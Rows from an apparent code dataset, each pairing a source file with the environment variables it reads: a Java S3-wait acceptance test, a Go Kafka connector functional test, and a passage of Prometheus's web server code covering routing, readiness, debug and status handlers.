s3.createBucket(bucket);
}
@After
public void tearDownProxy()
throws Exception
{
if (proxyServer != null) {
proxyServer.stop();
proxyServer = null;
}
}
@After
public void tearDownServer()
throws Exception
{
if (server != null) {
server.close();
server = null;
}
}
@Test
public void testRun()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for s3 polling to show up in logs
expect(Duration.ofSeconds(30), () -> {
String attemptLogs = TestUtils.getAttemptLogs(client, attemptId);
return attemptLogs.contains("s3_wait>: " + bucket + "/" + key);
});
// Verify that the dependent task has not been executed
assertThat(Files.exists(outfile), is(false));
// Verify that the attempt is not yet done
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(false));
// Create the file that the workflow is waiting for
String content = "hello world";
s3.putObject(bucket, key, new StringInputStream(content), new ObjectMetadata());
// Expect the attempt to finish and the dependent task to be executed
expect(Duration.ofMinutes(2), attemptSuccess(server.endpoint(), attemptId));
assertThat(Files.exists(outfile), is(true));
JsonNode objectMetadata = MAPPER.readTree(Files.readAllBytes(outfile));
int contentLength = objectMetadata.get("metadata").get("Content-Length").asInt();
assertThat(contentLength, is(content.length()));
}
@Test
public void testTimeout()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait_timeout.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait_timeout", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for the s3 polling to finish due to timeout
expect(Duration.ofSeconds(60), () -> {
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
return attempt.getDone();
});
// Verify that the attempt is done and failed
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(true));
assertThat(attempt.getSuccess(), is(false));
assertThat(attempt.getFinishedAt().isPresent(), is(true));
}
@Test
public void testContinueOnTimeout()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait_continue_on_timeout.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait_continue_on_timeout", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for the s3 polling to finish due to timeout
expect(Duration.ofSeconds(60), () -> {
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
return attempt.getDone();
});
// Verify that the attempt is done and succeeded
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(true));
assertThat(attempt.getSuccess(), is(true));
assertThat(attempt.getFinishedAt().isPresent(), is(true));
//Verify outfile
String outfileText = new String(Files.readAllBytes(outfile), UTF_8);
assertThat(outfileText.contains("Finished task +wait"), is(true));
assertThat(outfileText.contains("Empty is good"), is(true));
}
}
|
[
"\"TEST_S3_ENDPOINT\""
] |
[] |
[
"TEST_S3_ENDPOINT"
] |
[]
|
["TEST_S3_ENDPOINT"]
|
java
| 1 | 0 | |
Godeps/_workspace/src/github.com/elodina/siesta/connector_test.go
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package siesta
import (
"fmt"
"math/rand"
"net"
"os"
"testing"
"time"
)
var ci = os.Getenv("TRAVIS_CI") != ""
var brokerUp = false // assume the broker is down until the dial in init() succeeds
var brokerAddr = "localhost:9092"
func init() {
conn, err := net.Dial("tcp", brokerAddr)
if err == nil {
brokerUp = true
conn.Close()
}
}
func TestDefaultConnectorFunctional(t *testing.T) {
if !brokerUp && !ci {
t.Skip("Broker is not running. Please spin up the broker at localhost:9092 for this test to work.")
}
numMessages := 1000
topicName := fmt.Sprintf("siesta-%d", time.Now().Unix())
connector := testConnector(t)
testTopicMetadata(t, topicName, connector)
testOffsetStorage(t, topicName, connector)
testProduce(t, topicName, numMessages, connector)
testConsume(t, topicName, numMessages, connector)
closeWithin(t, time.Second, connector)
//check whether closing multiple times hangs
closeWithin(t, time.Second, connector)
anotherConnector := testConnector(t)
//should also work fine - must get topic metadata before consuming
testConsume(t, topicName, numMessages, anotherConnector)
closeWithin(t, time.Second, anotherConnector)
}
func testTopicMetadata(t *testing.T, topicName string, connector *DefaultConnector) {
metadata, err := connector.GetTopicMetadata([]string{topicName})
assertFatal(t, err, nil)
assertNot(t, len(metadata.Brokers), 0)
assertNot(t, len(metadata.TopicsMetadata), 0)
if len(metadata.Brokers) > 1 {
t.Skip("Cluster should consist only of one broker for this test to run.")
}
broker := metadata.Brokers[0]
assert(t, broker.ID, int32(0))
if ci {
// this can be asserted on Travis only as we are guaranteed to advertise the broker as localhost
assert(t, broker.Host, "localhost")
}
assert(t, broker.Port, int32(9092))
topicMetadata := findTopicMetadata(t, metadata.TopicsMetadata, topicName)
assert(t, topicMetadata.Error, ErrNoError)
assert(t, topicMetadata.Topic, topicName)
assertFatal(t, len(topicMetadata.PartitionsMetadata), 1)
partitionMetadata := topicMetadata.PartitionsMetadata[0]
assert(t, partitionMetadata.Error, ErrNoError)
assert(t, partitionMetadata.ISR, []int32{0})
assert(t, partitionMetadata.Leader, int32(0))
assert(t, partitionMetadata.PartitionID, int32(0))
assert(t, partitionMetadata.Replicas, []int32{0})
}
func testOffsetStorage(t *testing.T, topicName string, connector *DefaultConnector) {
group := fmt.Sprintf("test-%d", time.Now().Unix())
targetOffset := rand.Int63()
offset, err := connector.GetOffset(group, topicName, 0)
assertFatal(t, err, ErrUnknownTopicOrPartition)
assert(t, offset, int64(-1))
err = connector.CommitOffset(group, topicName, 0, targetOffset)
assertFatal(t, err, nil)
offset, err = connector.GetOffset(group, topicName, 0)
assertFatal(t, err, nil)
assert(t, offset, targetOffset)
}
func testProduce(t *testing.T, topicName string, numMessages int, connector *DefaultConnector) {
produceRequest := new(ProduceRequest)
produceRequest.AckTimeoutMs = 1000
produceRequest.RequiredAcks = 1
for i := 0; i < numMessages; i++ {
produceRequest.AddMessage(topicName, 0, &Message{
Key: []byte(fmt.Sprintf("%d", numMessages-i)),
Value: []byte(fmt.Sprintf("%d", i)),
})
}
leader, err := connector.tryGetLeader(topicName, 0, 3)
assert(t, err, nil)
assertNot(t, leader, (*brokerLink)(nil))
bytes, err := connector.syncSendAndReceive(leader, produceRequest)
assertFatal(t, err, nil)
produceResponse := new(ProduceResponse)
decodingErr := connector.decode(bytes, produceResponse)
assertFatal(t, decodingErr, (*DecodingError)(nil))
topicBlock, exists := produceResponse.Status[topicName]
assertFatal(t, exists, true)
partitionBlock, exists := topicBlock[int32(0)]
assertFatal(t, exists, true)
assert(t, partitionBlock.Error, ErrNoError)
assert(t, partitionBlock.Offset, int64(0))
}
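// testConsume fetches from offset 0 and verifies the message count, ordering,
// and key/value round-trip of everything testProduce wrote.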
func testConsume(t *testing.T, topicName string, numMessages int, connector *DefaultConnector) {
response, err := connector.Fetch(topicName, 0, 0)
assertFatal(t, response.Error(topicName, 0), ErrNoError)
assertFatal(t, err, nil)
messages, err := response.GetMessages()
assertFatal(t, err, nil)
assertFatal(t, len(messages), numMessages)
for i := 0; i < numMessages; i++ {
message := messages[i]
assert(t, message.Topic, topicName)
assert(t, message.Partition, int32(0))
assert(t, message.Offset, int64(i))
assert(t, message.Key, []byte(fmt.Sprintf("%d", numMessages-i)))
assert(t, message.Value, []byte(fmt.Sprintf("%d", i)))
}
}
func findTopicMetadata(t *testing.T, metadata []*TopicMetadata, topic string) *TopicMetadata {
for _, topicMetadata := range metadata {
if topicMetadata.Topic == topic {
return topicMetadata
}
}
t.Fatalf("TopicMetadata for topic %s not found", topic)
return nil
}
|
[
"\"TRAVIS_CI\""
] |
[] |
[
"TRAVIS_CI"
] |
[]
|
["TRAVIS_CI"]
|
go
| 1 | 0 | |
web/web.go
|
// Copyright 2013 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package web
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
stdlog "log"
"math"
"net"
"net/http"
"net/http/pprof"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"sort"
"strings"
"sync"
"sync/atomic"
template_text "text/template"
"time"
"github.com/alecthomas/units"
"github.com/go-kit/kit/log"
"github.com/go-kit/kit/log/level"
conntrack "github.com/mwitkow/go-conntrack"
"github.com/opentracing-contrib/go-stdlib/nethttp"
opentracing "github.com/opentracing/opentracing-go"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
io_prometheus_client "github.com/prometheus/client_model/go"
"github.com/prometheus/common/model"
"github.com/prometheus/common/route"
"github.com/prometheus/common/server"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/index"
"github.com/soheilhy/cmux"
"golang.org/x/net/netutil"
"google.golang.org/grpc"
"github.com/prometheus/prometheus/config"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/rules"
"github.com/prometheus/prometheus/scrape"
"github.com/prometheus/prometheus/storage"
"github.com/prometheus/prometheus/template"
"github.com/prometheus/prometheus/util/httputil"
api_v1 "github.com/prometheus/prometheus/web/api/v1"
api_v2 "github.com/prometheus/prometheus/web/api/v2"
"github.com/prometheus/prometheus/web/ui"
)
// Paths that are handled by the React / Reach router that should all be served the main React app's index.html.
var reactRouterPaths = []string{
"/",
"/alerts",
"/config",
"/flags",
"/graph",
"/rules",
"/service-discovery",
"/status",
"/targets",
"/tsdb-status",
"/version",
}
// withStackTracer logs the stack trace in case the request panics. The function
// will re-raise the error, which will then be handled by the net/http package.
// It is needed because the go-kit log package doesn't properly handle the
// panics from net/http (see https://github.com/go-kit/kit/issues/233).
func withStackTracer(h http.Handler, l log.Logger) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
defer func() {
if err := recover(); err != nil {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
level.Error(l).Log("msg", "panic while serving request", "client", r.RemoteAddr, "url", r.URL, "err", err, "stack", buf)
panic(err)
}
}()
h.ServeHTTP(w, r)
})
}
type metrics struct {
requestCounter *prometheus.CounterVec
requestDuration *prometheus.HistogramVec
responseSize *prometheus.HistogramVec
}
func newMetrics(r prometheus.Registerer) *metrics {
m := &metrics{
requestCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Name: "prometheus_http_requests_total",
Help: "Counter of HTTP requests.",
},
[]string{"handler", "code"},
),
requestDuration: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_request_duration_seconds",
Help: "Histogram of latencies for HTTP requests.",
Buckets: []float64{.1, .2, .4, 1, 3, 8, 20, 60, 120},
},
[]string{"handler"},
),
responseSize: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_response_size_bytes",
Help: "Histogram of response size for HTTP requests.",
Buckets: prometheus.ExponentialBuckets(100, 10, 8),
},
[]string{"handler"},
),
}
if r != nil {
r.MustRegister(m.requestCounter, m.requestDuration, m.responseSize)
registerFederationMetrics(r)
}
return m
}
func (m *metrics) instrumentHandlerWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return m.instrumentHandler(prefix+handlerName, handler)
}
}
func (m *metrics) instrumentHandler(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return promhttp.InstrumentHandlerCounter(
m.requestCounter.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerDuration(
m.requestDuration.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerResponseSize(
m.responseSize.MustCurryWith(prometheus.Labels{"handler": handlerName}),
handler,
),
),
)
}
// PrometheusVersion contains build information about Prometheus.
type PrometheusVersion = api_v1.PrometheusVersion
type LocalStorage interface {
storage.Storage
api_v1.TSDBAdminStats
}
// Handler serves various HTTP endpoints of the Prometheus server
type Handler struct {
logger log.Logger
gatherer prometheus.Gatherer
metrics *metrics
scrapeManager *scrape.Manager
ruleManager *rules.Manager
queryEngine *promql.Engine
lookbackDelta time.Duration
context context.Context
storage storage.Storage
localStorage LocalStorage
notifier *notifier.Manager
apiV1 *api_v1.API
router *route.Router
quitCh chan struct{}
reloadCh chan chan error
options *Options
config *config.Config
versionInfo *PrometheusVersion
birth time.Time
cwd string
flagsMap map[string]string
mtx sync.RWMutex
now func() model.Time
ready uint32 // ready is uint32 rather than boolean to be able to use atomic functions.
}
// ApplyConfig updates the config field of the Handler struct
func (h *Handler) ApplyConfig(conf *config.Config) error {
h.mtx.Lock()
defer h.mtx.Unlock()
h.config = conf
return nil
}
// Options for the web Handler.
type Options struct {
Context context.Context
TSDBRetentionDuration model.Duration
TSDBDir string
TSDBMaxBytes units.Base2Bytes
LocalStorage LocalStorage
Storage storage.Storage
QueryEngine *promql.Engine
LookbackDelta time.Duration
ScrapeManager *scrape.Manager
RuleManager *rules.Manager
Notifier *notifier.Manager
Version *PrometheusVersion
Flags map[string]string
ListenAddress string
CORSOrigin *regexp.Regexp
ReadTimeout time.Duration
MaxConnections int
ExternalURL *url.URL
RoutePrefix string
UseLocalAssets bool
UserAssetsPath string
ConsoleTemplatesPath string
ConsoleLibrariesPath string
EnableLifecycle bool
EnableAdminAPI bool
PageTitle string
RemoteReadSampleLimit int
RemoteReadConcurrencyLimit int
RemoteReadBytesInFrame int
Gatherer prometheus.Gatherer
Registerer prometheus.Registerer
}
// New initializes a new web Handler.
func New(logger log.Logger, o *Options) *Handler {
if logger == nil {
logger = log.NewNopLogger()
}
m := newMetrics(o.Registerer)
router := route.New().
WithInstrumentation(m.instrumentHandler).
WithInstrumentation(setPathWithPrefix(""))
cwd, err := os.Getwd()
if err != nil {
cwd = "<error retrieving current working directory>"
}
h := &Handler{
logger: logger,
gatherer: o.Gatherer,
metrics: m,
router: router,
quitCh: make(chan struct{}),
reloadCh: make(chan chan error),
options: o,
versionInfo: o.Version,
birth: time.Now().UTC(),
cwd: cwd,
flagsMap: o.Flags,
context: o.Context,
scrapeManager: o.ScrapeManager,
ruleManager: o.RuleManager,
queryEngine: o.QueryEngine,
lookbackDelta: o.LookbackDelta,
storage: o.Storage,
localStorage: o.LocalStorage,
notifier: o.Notifier,
now: model.Now,
ready: 0,
}
factoryTr := func(_ context.Context) api_v1.TargetRetriever { return h.scrapeManager }
factoryAr := func(_ context.Context) api_v1.AlertmanagerRetriever { return h.notifier }
FactoryRr := func(_ context.Context) api_v1.RulesRetriever { return h.ruleManager }
h.apiV1 = api_v1.NewAPI(h.queryEngine, h.storage, factoryTr, factoryAr,
func() config.Config {
h.mtx.RLock()
defer h.mtx.RUnlock()
return *h.config
},
o.Flags,
api_v1.GlobalURLOptions{
ListenAddress: o.ListenAddress,
Host: o.ExternalURL.Host,
Scheme: o.ExternalURL.Scheme,
},
h.testReady,
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
logger,
FactoryRr,
h.options.RemoteReadSampleLimit,
h.options.RemoteReadConcurrencyLimit,
h.options.RemoteReadBytesInFrame,
h.options.CORSOrigin,
h.runtimeInfo,
h.versionInfo,
)
if o.RoutePrefix != "/" {
// If the prefix is missing for the root path, prepend it.
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, o.RoutePrefix, http.StatusFound)
})
router = router.WithPrefix(o.RoutePrefix)
}
readyf := h.testReady
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/graph"), http.StatusFound)
})
router.Get("/alerts", readyf(h.alerts))
router.Get("/graph", readyf(h.graph))
router.Get("/status", readyf(h.status))
router.Get("/flags", readyf(h.flags))
router.Get("/config", readyf(h.serveConfig))
router.Get("/rules", readyf(h.rules))
router.Get("/targets", readyf(h.targets))
router.Get("/version", readyf(h.version))
router.Get("/service-discovery", readyf(h.serviceDiscovery))
router.Get("/metrics", promhttp.Handler().ServeHTTP)
router.Get("/federate", readyf(httputil.CompressionHandler{
Handler: http.HandlerFunc(h.federation),
}.ServeHTTP))
router.Get("/consoles/*filepath", readyf(h.consoles))
router.Get("/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
// Make sure that "<path-prefix>/new" is redirected to "<path-prefix>/new/" and
// not just the naked "/new/", which would be the default behavior of the router
// with the "RedirectTrailingSlash" option (https://godoc.org/github.com/julienschmidt/httprouter#Router.RedirectTrailingSlash),
// and which breaks users with a --web.route-prefix that deviates from the path derived
// from the external URL.
router.Get("/new", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "new")+"/", http.StatusFound)
})
router.Get("/new/*filepath", func(w http.ResponseWriter, r *http.Request) {
p := route.Param(r.Context(), "filepath")
// For paths that the React/Reach router handles, we want to serve the
// index.html, but with replaced path prefix placeholder.
for _, rp := range reactRouterPaths {
if p != rp {
continue
}
f, err := ui.Assets.Open("/static/react/index.html")
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error opening React index.html: %v", err)
return
}
idx, err := ioutil.ReadAll(f)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error reading React index.html: %v", err)
return
}
prefixedIdx := bytes.ReplaceAll(idx, []byte("PATH_PREFIX_PLACEHOLDER"), []byte(o.ExternalURL.Path))
prefixedIdx = bytes.ReplaceAll(prefixedIdx, []byte("CONSOLES_LINK_PLACEHOLDER"), []byte(h.consolesPath()))
w.Write(prefixedIdx)
return
}
// For all other paths, serve auxiliary assets.
r.URL.Path = path.Join("/static/react/", p)
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
if o.UserAssetsPath != "" {
router.Get("/user/*filepath", route.FileServe(o.UserAssetsPath))
}
if o.EnableLifecycle {
router.Post("/-/quit", h.quit)
router.Put("/-/quit", h.quit)
router.Post("/-/reload", h.reload)
router.Put("/-/reload", h.reload)
} else {
forbiddenAPINotEnabled := func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusForbidden)
w.Write([]byte("Lifecycle API is not enabled."))
}
router.Post("/-/quit", forbiddenAPINotEnabled)
router.Put("/-/quit", forbiddenAPINotEnabled)
router.Post("/-/reload", forbiddenAPINotEnabled)
router.Put("/-/reload", forbiddenAPINotEnabled)
}
router.Get("/-/quit", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/-/reload", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/debug/*subpath", serveDebug)
router.Post("/debug/*subpath", serveDebug)
router.Get("/-/healthy", func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Healthy.\n")
})
router.Get("/-/ready", readyf(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Ready.\n")
}))
return h
}
func serveDebug(w http.ResponseWriter, req *http.Request) {
ctx := req.Context()
subpath := route.Param(ctx, "subpath")
if subpath == "/pprof" {
http.Redirect(w, req, req.URL.Path+"/", http.StatusMovedPermanently)
return
}
if !strings.HasPrefix(subpath, "/pprof/") {
http.NotFound(w, req)
return
}
subpath = strings.TrimPrefix(subpath, "/pprof/")
switch subpath {
case "cmdline":
pprof.Cmdline(w, req)
case "profile":
pprof.Profile(w, req)
case "symbol":
pprof.Symbol(w, req)
case "trace":
pprof.Trace(w, req)
default:
req.URL.Path = "/debug/pprof/" + subpath
pprof.Index(w, req)
}
}
// Ready sets Handler to be ready.
func (h *Handler) Ready() {
atomic.StoreUint32(&h.ready, 1)
}
// Verifies whether the server is ready or not.
func (h *Handler) isReady() bool {
ready := atomic.LoadUint32(&h.ready)
return ready > 0
}
// Checks if server is ready, calls f if it is, returns 503 if it is not.
func (h *Handler) testReady(f http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if h.isReady() {
f(w, r)
} else {
w.WriteHeader(http.StatusServiceUnavailable)
fmt.Fprintf(w, "Service Unavailable")
}
}
}
// Checks if server is ready, calls f if it is, returns 503 if it is not.
func (h *Handler) testReadyHandler(f http.Handler) http.HandlerFunc {
return h.testReady(f.ServeHTTP)
}
// Quit returns the receive-only quit channel.
func (h *Handler) Quit() <-chan struct{} {
return h.quitCh
}
// Reload returns the receive-only channel that signals configuration reload requests.
func (h *Handler) Reload() <-chan chan error {
return h.reloadCh
}
// Run serves the HTTP endpoints.
func (h *Handler) Run(ctx context.Context) error {
level.Info(h.logger).Log("msg", "Start listening for connections", "address", h.options.ListenAddress)
listener, err := net.Listen("tcp", h.options.ListenAddress)
if err != nil {
return err
}
listener = netutil.LimitListener(listener, h.options.MaxConnections)
// Monitor incoming connections with conntrack.
listener = conntrack.NewListener(listener,
conntrack.TrackWithName("http"),
conntrack.TrackWithTracing())
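// cmux multiplexes gRPC and plain HTTP/1 traffic on the same listener, so the
// v2 gRPC API and the regular web handler can share a single port.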
var (
m = cmux.New(listener)
// See https://github.com/grpc/grpc-go/issues/2636 for why we need to use MatchWithWriters().
grpcl = m.MatchWithWriters(cmux.HTTP2MatchHeaderFieldSendSettings("content-type", "application/grpc"))
httpl = m.Match(cmux.HTTP1Fast())
grpcSrv = grpc.NewServer()
)
av2 := api_v2.New(
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
)
av2.RegisterGRPC(grpcSrv)
hh, err := av2.HTTPHandler(ctx, h.options.ListenAddress)
if err != nil {
return err
}
hhFunc := h.testReadyHandler(hh)
operationName := nethttp.OperationNameFunc(func(r *http.Request) string {
return fmt.Sprintf("%s %s", r.Method, r.URL.Path)
})
mux := http.NewServeMux()
mux.Handle("/", h.router)
apiPath := "/api"
if h.options.RoutePrefix != "/" {
apiPath = h.options.RoutePrefix + apiPath
level.Info(h.logger).Log("msg", "Router prefix", "prefix", h.options.RoutePrefix)
}
av1 := route.New().
WithInstrumentation(h.metrics.instrumentHandlerWithPrefix("/api/v1")).
WithInstrumentation(setPathWithPrefix(apiPath + "/v1"))
h.apiV1.Register(av1)
mux.Handle(apiPath+"/v1/", http.StripPrefix(apiPath+"/v1", av1))
mux.Handle(apiPath+"/", http.StripPrefix(apiPath,
http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
httputil.SetCORS(w, h.options.CORSOrigin, r)
hhFunc(w, r)
}),
))
errlog := stdlog.New(log.NewStdlibAdapter(level.Error(h.logger)), "", 0)
httpSrv := &http.Server{
Handler: withStackTracer(nethttp.Middleware(opentracing.GlobalTracer(), mux, operationName), h.logger),
ErrorLog: errlog,
ReadTimeout: h.options.ReadTimeout,
}
errCh := make(chan error)
go func() {
errCh <- httpSrv.Serve(httpl)
}()
go func() {
errCh <- grpcSrv.Serve(grpcl)
}()
go func() {
errCh <- m.Serve()
}()
select {
case e := <-errCh:
return e
case <-ctx.Done():
httpSrv.Shutdown(ctx)
grpcSrv.GracefulStop()
return nil
}
}
func (h *Handler) alerts(w http.ResponseWriter, r *http.Request) {
var groups []*rules.Group
for _, group := range h.ruleManager.RuleGroups() {
if group.HasAlertingRules() {
groups = append(groups, group)
}
}
alertStatus := AlertStatus{
Groups: groups,
AlertStateToRowClass: map[rules.AlertState]string{
rules.StateInactive: "success",
rules.StatePending: "warning",
rules.StateFiring: "danger",
},
Counts: alertCounts(groups),
}
h.executeTemplate(w, "alerts.html", alertStatus)
}
func alertCounts(groups []*rules.Group) AlertByStateCount {
result := AlertByStateCount{}
for _, group := range groups {
for _, alert := range group.AlertingRules() {
switch alert.State() {
case rules.StateInactive:
result.Inactive++
case rules.StatePending:
result.Pending++
case rules.StateFiring:
result.Firing++
}
}
}
return result
}
func (h *Handler) consoles(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
name := route.Param(ctx, "filepath")
file, err := http.Dir(h.options.ConsoleTemplatesPath).Open(name)
if err != nil {
http.Error(w, err.Error(), http.StatusNotFound)
return
}
defer file.Close()
text, err := ioutil.ReadAll(file)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
ctx = httputil.ContextFromRequest(ctx, r)
// Provide URL parameters as a map for easy use. Advanced users may have need for
// parameters beyond the first, so provide RawParams.
rawParams, err := url.ParseQuery(r.URL.RawQuery)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
params := map[string]string{}
for k, v := range rawParams {
params[k] = v[0]
}
externalLabels := map[string]string{}
h.mtx.RLock()
els := h.config.GlobalConfig.ExternalLabels
h.mtx.RUnlock()
for _, el := range els {
externalLabels[el.Name] = el.Value
}
// Inject some convenience variables that are easier to remember for users
// who are not used to Go's templating system.
defs := []string{
"{{$rawParams := .RawParams }}",
"{{$params := .Params}}",
"{{$path := .Path}}",
"{{$externalLabels := .ExternalLabels}}",
}
data := struct {
RawParams url.Values
Params map[string]string
Path string
ExternalLabels map[string]string
}{
RawParams: rawParams,
Params: params,
Path: strings.TrimLeft(name, "/"),
ExternalLabels: externalLabels,
}
tmpl := template.NewTemplateExpander(
ctx,
strings.Join(append(defs, string(text)), ""),
"__console_"+name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
filenames, err := filepath.Glob(h.options.ConsoleLibrariesPath + "/*.lib")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
result, err := tmpl.ExpandHTML(filenames)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
func (h *Handler) graph(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "graph.html", nil)
}
func (h *Handler) status(w http.ResponseWriter, r *http.Request) {
status := struct {
Birth time.Time
CWD string
Version *PrometheusVersion
Alertmanagers []*url.URL
GoroutineCount int
GOMAXPROCS int
GOGC string
GODEBUG string
CorruptionCount int64
ChunkCount int64
TimeSeriesCount int64
LastConfigTime time.Time
ReloadConfigSuccess bool
StorageRetention string
NumSeries uint64
MaxTime int64
MinTime int64
Stats *index.PostingsStats
Duration string
}{
Birth: h.birth,
CWD: h.cwd,
Version: h.versionInfo,
Alertmanagers: h.notifier.Alertmanagers(),
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
http.Error(w, fmt.Sprintf("error gathering runtime status: %s", err), http.StatusInternalServerError)
return
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
